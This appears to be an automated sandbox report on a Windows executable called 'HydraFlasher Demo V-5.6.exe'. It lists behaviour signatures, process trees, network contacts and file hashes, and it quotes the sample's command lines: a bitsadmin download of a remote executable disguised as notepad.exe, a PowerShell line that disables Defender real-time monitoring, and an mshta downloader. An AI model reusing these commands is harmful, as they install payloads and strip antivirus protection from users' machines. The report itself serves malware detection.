Analysis Overview
SHA256
536f89dfb901d73ce17c796a32328282d6b0550c3e462dff09d488e1260584c0
Threat Level: Likely malicious
The file HydraFlasher Demo V-5.6.exe was found to be: Likely malicious.
Malicious Activity Summary
Download via BitsAdmin
.NET Reactor proctector
Checks computer location settings
Executes dropped EXE
Command and Scripting Interpreter: PowerShell
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Unsigned PE
Modifies registry class
Checks SCSI registry key(s)
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Suspicious use of SendNotifyMessage
Suspicious use of FindShellTrayWindow
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-07-28 18:59
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-07-28 18:59
Reported
2024-07-28 19:02
Platform
win10v2004-20240709-en
Max time kernel
50s
Max time network
104s
Command Line
Signatures
Download via BitsAdmin
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
.NET Reactor proctector
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\HydraFlasher Demo V-5.6.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\HydraFlasher Demo V.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\HydraFlasher Demo V.exe | N/A |
| N/A | N/A | C:\Users\Admin\HydraFlasher Demo.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\HydraFlasher Demo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\HydraFlasher Demo V-5.6.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\HydraFlasher Demo V.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000_Classes\Local Settings | C:\Windows\system32\taskmgr.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| Token: SeCreateGlobalPrivilege | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\taskmgr.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\HydraFlasher Demo V-5.6.exe
"C:\Users\Admin\AppData\Local\Temp\HydraFlasher Demo V-5.6.exe"
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
C:\Users\Admin\AppData\Local\Temp\HydraFlasher Demo V.exe
"C:\Users\Admin\AppData\Local\Temp\HydraFlasher Demo V.exe"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Downloader.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
C:\Users\Admin\HydraFlasher Demo.exe
"C:\Users\Admin\HydraFlasher Demo.exe"
C:\Windows\SysWOW64\bitsadmin.exe
"C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/sleeper-cell/security/releases/download/dllhost/xvchosts.exe C:\Users\Admin\AppData\Roaming\notepad.exe
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -ExecutionPolicy Bypass -Command Set-MpPreference -DisableRealtimeMonitoring $true
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.blockchain.com/btc/address/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdd61646f8,0x7ffdd6164708,0x7ffdd6164718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2116,3695465504544951676,7694097236913931085,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2128 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2116,3695465504544951676,7694097236913931085,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2244 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2116,3695465504544951676,7694097236913931085,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2816 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,3695465504544951676,7694097236913931085,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3368 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,3695465504544951676,7694097236913931085,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3376 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 13.107.21.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 237.21.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 192.142.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.140.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.blockchain.com | udp |
| US | 104.17.11.85:443 | www.blockchain.com | tcp |
| US | 104.17.11.85:443 | www.blockchain.com | tcp |
| US | 8.8.8.8:53 | ssl.google-analytics.com | udp |
| US | 8.8.8.8:53 | coinzillatag.com | udp |
| US | 104.21.69.73:443 | coinzillatag.com | tcp |
| US | 8.8.8.8:53 | 85.11.17.104.in-addr.arpa | udp |
| FR | 172.217.18.200:443 | ssl.google-analytics.com | tcp |
| US | 104.21.69.73:443 | coinzillatag.com | tcp |
| FR | 172.217.18.200:443 | ssl.google-analytics.com | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\HydraFlasher Demo V.exe
| MD5 | 154e7c4941e5c99f6fe369ff90dc8370 |
| SHA1 | d155c4fcccc60ae26291fd1177780b3591ccbb49 |
| SHA256 | ff295bc05708762ae2fc54195c8785708291219e6d07ec52077980049e1f3d24 |
| SHA512 | c37427cae52c78d95829b690113a5dab7c4a859a7d2c8781bd1580c9af24b6a7eb53d0d3bdaf87aa505035f2620e36e5688ea5da90eb7c16203a7bea634c544d |
memory/1952-13-0x000002A5EFB80000-0x000002A5EFB81000-memory.dmp
memory/1952-12-0x000002A5EFB80000-0x000002A5EFB81000-memory.dmp
memory/1952-11-0x000002A5EFB80000-0x000002A5EFB81000-memory.dmp
memory/4728-14-0x0000000000AE0000-0x000000000158A000-memory.dmp
memory/1952-22-0x000002A5EFB80000-0x000002A5EFB81000-memory.dmp
memory/1952-24-0x000002A5EFB80000-0x000002A5EFB81000-memory.dmp
memory/1952-23-0x000002A5EFB80000-0x000002A5EFB81000-memory.dmp
memory/1952-21-0x000002A5EFB80000-0x000002A5EFB81000-memory.dmp
memory/1952-20-0x000002A5EFB80000-0x000002A5EFB81000-memory.dmp
memory/1952-19-0x000002A5EFB80000-0x000002A5EFB81000-memory.dmp
memory/1952-18-0x000002A5EFB80000-0x000002A5EFB81000-memory.dmp
C:\Users\Admin\HydraFlasher Demo.exe
| MD5 | ac70d7032b72fb148ac74a0b902de461 |
| SHA1 | c3fe932e0e5f672b1dedd5309087f7e7d165c683 |
| SHA256 | a672ed87b2f51e8f549194b1e2bdfcd8b3d3326bc60f2eb8e76ab7f4422a5c63 |
| SHA512 | f840046e0192605aacd9e428bb46fffd53bc39c7f0ce04ccb5ba81df35cee36a6fffc7cbd6ad51e89eea3cbbc3687951a3baf8de662c4068cc026dba62a44b8a |
C:\Users\Admin\Downloader.hta
| MD5 | 2dc6046e1cd218ba1ae101c6a96cb1ea |
| SHA1 | 26f057f84ca50739d3be3bdb022906b296364744 |
| SHA256 | 012954762478b91e47a668255ce82791a4078761b18aaa74fc4e4c7168214cc8 |
| SHA512 | 49f202b82a9561022b5b1299bbb2fcbda7ac89de6b8cfe7d5ba68ba08002b0cdefa93642128c08b217741644245fa2f550581bb4107676a592d615cdcdaa9179 |
memory/4260-58-0x0000000000990000-0x0000000001430000-memory.dmp
memory/4260-59-0x0000000006610000-0x0000000006BB4000-memory.dmp
memory/4260-60-0x0000000005E60000-0x0000000005EF2000-memory.dmp
memory/4260-61-0x0000000005E50000-0x0000000005E5A000-memory.dmp
memory/1564-65-0x0000000002960000-0x0000000002996000-memory.dmp
memory/1564-66-0x00000000056F0000-0x0000000005D18000-memory.dmp
memory/1564-67-0x00000000052E0000-0x0000000005302000-memory.dmp
memory/1564-68-0x0000000005580000-0x00000000055E6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_apebtnye.ubp.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1564-74-0x0000000005660000-0x00000000056C6000-memory.dmp
memory/1564-79-0x0000000005D20000-0x0000000006074000-memory.dmp
memory/1564-80-0x00000000056D0000-0x00000000056EE000-memory.dmp
memory/1564-81-0x00000000062F0000-0x000000000633C000-memory.dmp
memory/1564-82-0x0000000007460000-0x0000000007492000-memory.dmp
memory/1564-83-0x000000006C4C0000-0x000000006C50C000-memory.dmp
memory/1564-93-0x0000000006880000-0x000000000689E000-memory.dmp
memory/1564-94-0x00000000074A0000-0x0000000007543000-memory.dmp
memory/1564-95-0x0000000007C30000-0x00000000082AA000-memory.dmp
memory/1564-96-0x00000000075F0000-0x000000000760A000-memory.dmp
memory/1564-97-0x0000000007660000-0x000000000766A000-memory.dmp
memory/1564-98-0x0000000007870000-0x0000000007906000-memory.dmp
memory/1564-99-0x00000000077F0000-0x0000000007801000-memory.dmp
memory/1564-100-0x0000000007820000-0x000000000782E000-memory.dmp
memory/1564-101-0x0000000007830000-0x0000000007844000-memory.dmp
memory/1564-102-0x0000000007930000-0x000000000794A000-memory.dmp
memory/1564-103-0x0000000007910000-0x0000000007918000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 54aadd2d8ec66e446f1edb466b99ba8d |
| SHA1 | a94f02b035dc918d8d9a46e6886413f15be5bff0 |
| SHA256 | 1971045943002ef01930add9ba1a96a92ddc10d6c581ce29e33c38c2120b130e |
| SHA512 | 7e077f903463da60b5587aed4f5352060df400ebda713b602b88c15cb2f91076531ea07546a9352df772656065e0bf27bd285905a60f036a5c5951076d35e994 |
\??\pipe\LOCAL\crashpad_3532_XUJIWUYPWRVMKRJZ
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 2f842025e22e522658c640cfc7edc529 |
| SHA1 | 4c2b24b02709acdd159f1b9bbeb396e52af27033 |
| SHA256 | 1191573f2a7c12f0b9b8460e06dc36ca5386305eb8c883ebbbc8eb15f4d8e23e |
| SHA512 | 6e4393fd43984722229020ef662fc5981f253de31f13f30fadd6660bbc9ededcbfd163f132f6adaf42d435873322a5d0d3eea60060cf0e7f2e256262632c5d05 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | b056dc60bb476d9ac65ad76c9c778f45 |
| SHA1 | cd4943b47e697b7c773448580573d6292e7ef1eb |
| SHA256 | 9a06a7cd0edcaf9ad4669bdfc3bf4bac6399f80a22d2cf6884da8e166c02383d |
| SHA512 | 5d4e75dac237f3b1950cfccc48e18cfb4b13a1e553be0160373462a2321160ca2448fbce398a562839a84d86634783ed6e577adaee4d15e1a1b85d7b9d7e985c |